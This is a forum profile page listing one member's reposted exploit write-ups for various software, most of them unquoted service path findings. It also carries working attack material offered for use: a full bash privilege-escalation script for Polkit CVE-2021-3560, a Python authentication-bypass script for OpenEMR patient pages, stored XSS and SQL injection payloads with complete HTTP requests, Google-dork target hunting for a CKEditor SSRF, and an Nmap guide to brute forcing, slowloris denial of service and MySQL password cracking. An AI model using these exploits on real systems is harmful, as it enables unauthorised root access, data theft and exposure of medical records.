Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://bitbucket.org/phjounin/tftpd64/src/master/ # Software Links: https://bitbucket.org/phjounin/tftpd64/wiki/Download%20Tftpd64.md # Tested Version: 4.64 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Tftpd32 service edition Tftpd32_svc C:\Program Files\Tftpd64_SE\tftpd64_svc.exe Auto C:\Users\IEUser>sc qc Tftpd32_svc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Tftpd32_svc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Tftpd64_SE\tftpd64_svc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Tftpd32 service edition DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  2. HireHackking

    SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://www.sysgauge.com # Software Link: https://www.sysgauge.com/setups/sysgaugesrv_setup_v7.9.18.exe # Tested Version: 7.9.18 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ C:\>sc qc "SysGauge Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SysGauge Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\SysGauge Server\bin\sysgaus.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : SysGauge Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  3. HireHackking

    Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path # Discovery by: BRushiran # Date: 15-06-2021 # Vendor Homepage: https://www.disksorter.com # Software Links: https://www.disksorter.com/setups_x64/disksorterent_setup_v13.6.12_x64.exe # Tested Version: 13.6.12 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Disk Sorter Enterprise Disk Sorter Enterprise C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe Auto C:\>sc qc "Disk Sorter Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Sorter Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Sorter Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  4. HireHackking

    Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path # Discovery by: BRushiran # Date: 15-06-2021 # Vendor Homepage: https://www.disksorter.com # Software Links: https://www.disksorter.com/setups_x64/disksortersrv_setup_v13.6.12_x64.exe # Tested Version: 13.6.12 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Disk Sorter Server Disk Sorter Server C:\Program Files\Disk Sorter Server\bin\disksrs.exe Auto C:\>sc qc "Disk Sorter Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Sorter Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter Server\bin\disksrs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Sorter Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  5. HireHackking

    DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://www.diskpulse.com # Software Links: # https://www.diskpulse.com/setups_x64/diskpulseent_setup_v13.6.14_x64.exe # https://www.diskpulse.com/setups_x64/diskpulsesrv_setup_v13.6.14_x64.exe # Tested Version: 13.6.14 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Disk Pulse Enterprise Disk Pulse Enterprise C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe Auto Disk Pulse Server Disk Pulse Server C:\Program Files\Disk Pulse Server\bin\diskpls.exe Auto C:\Users\IEUser>sc qc "Disk Pulse Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Pulse Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Pulse Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\IEUser>sc qc "Disk Pulse Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Disk Pulse Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse Server\bin\diskpls.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Disk Pulse Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  6. HireHackking

    Polkit 0.105-26 0.117-2 - Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation # Date: 06/11/2021 # Exploit Author: J Smith (CadmusofThebes) # Vendor Homepage: https://www.freedesktop.org/ # Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html # Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora) # Tested on: Ubuntu 20.04, Fedora 33 # CVE: CVE-2021-3560 # Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ #!/bin/bash # Set the name and display name userName="hacked" realName="hacked" # Set the account as an administrator accountType=1 # Set the password hash for 'password' and password hint password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB' passHint="password" # Check Polkit version polkitVersion=$(systemctl status polkit.service | grep version | cut -d " " -f 9) if [[ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 || "$(yum list installed | grep polkit | grep -c 0.117-2)" ]]; then echo "[*] Vulnerable version of polkit found" else echo "[!] WARNING: Version of polkit might not vulnerable" fi # Validate user is running in SSH instead of desktop terminal if [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then echo "[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts" exit fi # Test the dbus-send timing to load into exploit echo "[*] Determining dbus-send timing" realTime=$( TIMEFORMAT="%R"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d " " -f6 ) halfTime=$(echo "scale=3;$realTime/2" | bc) # Check for user first in case previous run of script failed on password set if id "$userName" &>/dev/null; then userid=$(id -u $userName) echo "[*] New user $userName already exists with uid of $userid" else userid="" echo "[*] Attempting to create account" while [[ $userid == "" ]] do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null if id "$userName" &>/dev/null; then userid=$(id -u $userName) echo "[*] New user $userName created with uid of $userid" fi done fi # Add the password to /etc/shadow # Sleep added to ensure there is enough of a delay between timestamp checks echo "[*] Adding password to /etc/shadow and enabling user" sleep 1 currentTimestamp=$(stat -c %Z /etc/shadow) fileChanged="n" while [ $fileChanged == "n" ] do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null if [ $(stat -c %Z /etc/shadow) -ne $currentTimestamp ];then fileChanged="y" echo "[*] Exploit complete!" fi done echo "" echo "[*] Run 'su - $userName', followed by 'sudo su' to gain root access"
  7. HireHackking

    Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 14-06-2021 # Vendor Homepage: https://brother.com # Software Link: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=ads1000w_us&os=10013&dlid=dlf002778_000&flang=4&type3=46 # Tested Version: 1.38 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Brother BRAgent WBA_Agent_Client C:\Program Files (x86)\Brother\BRAgent\BRAgtSrv.exe Auto C:\>sc qc WBA_Agent_Client [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: WBA_Agent_Client TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Brother\BRAgent\BRAgtSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Brother BRAgent DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  8. HireHackking

    Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting # Date: 2021-15-06 # Exploit Author: Fatih İLGİN # Vendor Homepage: cotonti.com # Vulnerable Software: https://www.cotonti.com/download/siena_0919 # Affected Version: 0.9.19 # Tested on: Windows 10 # Vulnerable Parameter Type: POST # Vulnerable Parameter: maintitle # Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img> # Description 1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php) 2) Then go to Configuration tab and set payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for Site title param 3) Then click Update button 4) In the end, Go to home page then shown triggered vulnerability # Proof of Concepts Request; POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1 Host: vulnerableapplication.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 440 Origin: https://vulnerableapplication.com Connection: close Referer: https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title Cookie: __cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA; _ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561; __gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA; PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3 &x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D Response; HTTP/1.1 200 OK Date: Tue, 15 Jun 2021 16:07:59 GMT Server: Apache Expires: Mon, Apr 01 1974 00:00:00 GMT Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0 Pragma: no-cache Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT Vary: Accept-Encoding X-Robots-Tag: noindex,nofollow Content-Length: 4366 Connection: close Content-Type: text/html; charset=UTF-8 <h1 class="body"><a href="admin.php" title="Administration panel">Administration panel</a> / <a href="admin.php?m=config" title="Configuration">Configuration</a> / <a href="admin.php?m=config&n=edit&o=core&p=title" title="Titles and Metas">Titles and Metas</a></h1> <div id="main" class="body clear"> <h2>Configuration</h2> <div class="done"> <h4>Done</h4> <ul> <li>Updated</li> </ul> </div>
  9. HireHackking

    CKEditor 3 - Server-Side Request Forgery (SSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF) # Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html # Date: 12-6-2021 # Exploit Author: Blackangel # Software Link: https://ckeditor.com/ # Version:all version under 4 (1,2,3) # Tested on: windows 7 Steps of Exploit:- 1-using google dorks inurl /editor/filemanager/connectors/uploadtest.html 2-after going to vulnerable page you will find filed “Custom Uploader URL: ” 3-right click then choose inspect element, click on pick an element from the page , select field Custom Uploader URL: 4-in elements “<input id=”txtCustomUrl” style=”WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc” disabled=”” type=”text”>” delete disabled=”” 5-now you can put url start with any protocal 6-send it to the server as you see website that you have entered link is appear into page . what this mean??!!1 you send request to server using vulnerable website you can said i used it as proxy hackers >>> vulnerable website >>> http:/xx.com so in http://xx.com logs requests come from vulnerable website impact:- 1-that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing. if there is big company use old version hackers can send request via there websites and this not good for reputation of company 2-put big company website in blacklist of websites cause i hackers can send many of request via vulnerable website Mitigation:- Remove the uploadtest.html file as it is not used by the application.
  10. HireHackking

    Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS) # Date: 05-10-2021 # Exploit Author: nhattruong # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 + XAMPP v3.2.4 POC: 1. Go to url http://localhost/admin/index.php 2. Do login 3. Execute the payload 4. Reload page to see the different Payload: POST /admin/adminprofile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 91 Origin: http://localhost Connection: close Referer: http://localhost/trms/admin/adminprofile.php Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l Upgrade-Insecure-Requests: 1 adminname=Adminm&username=admin&mobilenumber=8979555556&email="><script>alert(123);</script>&submit=
  11. HireHackking

    Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated) # Date: 05-10-2021 # Exploit Author: nhattruong # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 + XAMPP v3.2.4 POC: 1. Go to url http://localhost/login.php 2. Login with default creds 3. Execute the payload Payload #1: POST /admin/search.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 32 Origin: http://localhost Connection: close Referer: http://localhost/trms/admin/search.php Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0 Upgrade-Insecure-Requests: 1 searchdata=a' or 1=1-- -&search= Payload #2: http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- - Payload #3: http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -
  12. HireHackking

    OpenEMR 5.0.1.3 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass # Date 15.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip # Version: All versions prior to 5.0.1.4 # Tested on: Ubuntu 18.04 # CVE: CVE-2018-15152 # CWE: CWE-287 # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit ''' Description: An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to the registration page and modifying the requested url to access the desired page. Some examples of pages in the portal directory that are accessible after browsing to the registration page include: - add_edit_event_user.php - find_appt_popup_user.php - get_allergies.php - get_amendments.php - get_lab_results.php - get_medications.php - get_patient_documents.php - get_problems.php - get_profile.php - portal_payment.php - messaging/messages.php - messaging/secure_chat.php - report/pat_ledger.php - report/portal_custom_report.php - report/portal_patient_report.php Normally, access to these pages requires authentication as a patient. If a user were to visit any of those pages unauthenticated, they would be redirected to the login page. ''' ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--Openemrpath', type=str) my_parser.add_argument('-R', '--PathToGet', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT openemr_path = args.Openemrpath pathtoread = args.PathToGet ''' Check for vulnerability: ''' # Check, if Registration portal is enabled. If it is not, this exploit can not work session = requests.Session() check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php' check_vuln = session.get(check_vuln_url).text print('') print('[*] Checking vulnerability: ') print('') if "Enter email address to receive registration." in check_vuln: print('[+] Host Vulnerable. Proceeding exploit') else: print('[-] Host is not Vulnerable: Registration for patients is not enabled') ''' Exploit: ''' header = { 'Referer': check_vuln_url } exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread Exploit = session.get(exploit_url, headers=header) print('') print('[+] Results: ') print('') print(Exploit.text) print('')
  13. HireHackking

    Title: Nmap Script User Guide

    HireHackking posted a blog entry in Hacker Technology
    I have written about Nmap tutorials many times in the previous article. Usually, we directly scan the port with Nmap, and then use msf nessus to scan and exploit the vulnerability. So the whole process is quite cumbersome, so we need to understand the Nmap extension script! nmap --script Nmap's script location: /usr/share/nmap/scripts/ Check the number of scripts ls /usr/share/nmap/scripts/| wc -l can be seen that there are currently 605 plug-ins. Of course, we can write these plug-ins ourselves or download them. All in all very convenient. nmap scripts are mainly divided into the following categories. When scanning, you can set them as needed - script=category. This method is used to perform a more general scan: Script name indicates auth bypass authentication. Detect whether there is a weak password in the broadcast LAN to detect more service activation status. Brute brute-force cracking methods. For common applications such as http/snmp, default, use the -sC or -A option to scan the default script. Dos is used for denial of service attacks. Exploit utilizes known vulnerabilities. Vuln is responsible for checking whether the target machine has common vulnerabilities. Common examples Check weak password nmap --script=auth 192.168.123.1 Brute force cracking can brute-force crack down on common protocols such as mysql http smtp. nmap --script=brute 192.168.123.1 is as follows. Through brute force cracking, we got the login password of telent as admin Try to log in Default script scanning The default script scanning mainly collects information from various application services. After collection, attacks can be carried out on specific services. nmap --script=default 192.168.123.1 or nmap -sC 192.168.123.1 Check for common vulnerabilities nmap --script=vuln 192.168.123.1 scan, the target may have a CVE:CVE-2007-6750 vulnerability Vulnerability Exploit Search for this vulnerability in msf and configure relevant information! search CVE-2007-6750 use auxiliary/dos/http/slowloris show options set rhost 192.168.123.1 run whois analysis We conduct historical analysis query on the forum address bbskali.cn. nmap --script external bbskali.cn as follows We have obtained a lot of useful information HTTP authentication blast nmap --script=http-brute 192.168.123.1 Similarly, we use the router's login password as the cracking object, and the cracking gets the account and password as admin Note: Nmap's default dictionary location is: /usr/share/nmap/nselib/data Website directory scan Similar to Yujian, nmap can also scan the website directory. nmap --script=http-ls bbskali.cn mysql-related #Cracking root password nmap -p3306 --script=mysql-empty-password.nse 192.168.123.129 #List mysql users nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.123.129
  14. HireHackking

    Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.syncbreeze.com/ # Software Links: # https://www.syncbreeze.com/setups_x64/syncbreezesrv_setup_v13.6.18_x64.exe # https://www.syncbreeze.com/setups_x64/syncbreezeent_setup_v13.6.18_x64.exe # Tested Version: 13.6.18 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Sync Breeze Server Sync Breeze Server C:\Program Files\Sync Breeze Server\bin\syncbrs.exe Auto Sync Breeze Enterprise Sync Breeze Enterprise C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe Auto C:\Users\IEUser>sc qc "Sync Breeze Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Sync Breeze Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze Server\bin\syncbrs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Sync Breeze Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\IEUser>sc qc "Sync Breeze Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Sync Breeze Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Sync Breeze Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  15. HireHackking

    Unified Office Total Connect Now 1.0 - 'data' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Unified Office Total Connect Now 1.0 – 'data' SQL Injection # Shodan Filter: http.title:"TCN User Dashboard" # Date: 06-16-2021 # Exploit Author: Ajaikumar Nadar # Vendor Homepage: https://unifiedoffice.com/ # Software Link: https://unifiedoffice.com/voip-business-solutions/ # Version: 1.0 # Tested on: CentOS + Apache/2.2.15 POC: 1. Go to url http://localhost/operator/operatorLogin.php and login 2. Capture the request in Burpsuite and use the payload as given below. 3. Observe the response which reveals the DB version of mysql. Request: POST /operator/operatorLogin.php HTTP/1.1 Host: localhost Connection: close Content-Length: 178 sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99" Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://localhost/operator/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81 data={"extension":"((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))","pin":"bar"} Response: HTTP/1.1 400 Bad Request Date: Wed, 16 Jun 2021 12:49:56 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.10 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 139 Connection: close Content-Type: text/html; charset=UTF-8 Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key'
  16. HireHackking

    VX Search 13.5.28 - 'Multiple' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: VX Search 13.5.28 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.vxsearch.com # Software Links: # https://www.vxsearch.com/setups_x64/vxsearchsrv_setup_v13.5.28_x64.exe # https://www.vxsearch.com/setups_x64/vxsearchent_setup_v13.5.28_x64.exe # Tested Version: 13.5.28 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ VX Search Server VX Search Server C:\Program Files\VX Search Server\bin\vxsrchs.exe Auto VX Search Enterprise VX Search Enterprise C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe Auto C:\>sc qc "VX Search Server" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: VX Search Server TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search Server\bin\vxsrchs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : VX Search Server DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\>sc qc "VX Search Enterprise" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: VX Search Enterprise TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search Enterprise\bin\vxsrchs.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : VX Search Enterprise DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  17. HireHackking

    Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
